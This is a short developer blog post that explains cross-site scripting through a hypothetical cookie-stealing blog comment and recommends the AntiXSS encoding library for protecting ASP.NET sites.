Security is major concern for our clients when they ask us to develop their website. Hence we have to take care of attacks like sql injection and cross-site scripting attacks.
today I come across with a very good library to prevent our website against cross-site scripting attacks.
Cross-site scripting (XSS) attacks occur when an attacker uses a web apps to inject malicious code(mainly scripting), generally in the form of a browser side script(means java script), to a different end user.
A simple example of this kind of attack works like this:
- A hacker – I will call him Mr Jack – notices that my blog’s comment system doesn’t screen input(means my blog application does not take care of what type of inputs are coming in my blog comments)
- Mr Jack posts some malicious content, maybe something with a script tag, or maybe something that steals cookies, like
“Great post! nice article div.. “
- now next person to visit my site – I call him Mr Goodguy – is presented with the HTML that Mr Jack posted in the comment, which grabs their cookies and sends them off to their evil server
that means my site become vulnerable and it will harm to my faithful follower and visitor of my blog like Mr. Goodguy. And Mr. Jack will stolen Mr. Goodguy data when Mr. Goodgoy will visit my blog.
This is a simple example, but as you can imagine, these attacks can get pretty devious. Twitter, Facebook, and MySpace ,LinkedIn and now google + have been hit with this. Take a look at the OWASP writeup for more info, and take a look at the XSS Cheat Sheet at ha.ckers.org to get an idea of how sneaky these attacks can be.
AntiXSS is a part of the Windows Protection Library, which has a lot of encoding functions which help prevent XSS attacks in ASP.NET apps. Whereas the standard .NET framework encoding uses a blacklist approach, filtering out known bad characters, like < > and ” characters, the AntiXSS library uses a whitelist of known good characters. AntiXSS also has protections in place spanning character sets in over a different languages(hence it will work with your globalization and localization pages of your websites) . Due to this approach, AntiXSS is inherently safer against new XSS attacks.
There are two ways you can use AntiXSS in your ASP.NET applications:
1. You can make use of the AntiXSS Encoder in your web apps coding (e.g. controller code, View markup in ASP.NET MVC, and Web Forms code behind, and Web Forms markup of ASP.net webform)
2. If you’re using ASP.NET 4.0, you can also specify a default encoder, which will be used by ASP.NET whenever it needs to encode output. The recommended approach is to use AntiXSS as your default encoder.
to download AntiXSS you can go to codplex : download
I hope this will help you to overcome your website’s cross site scripting vulnerability.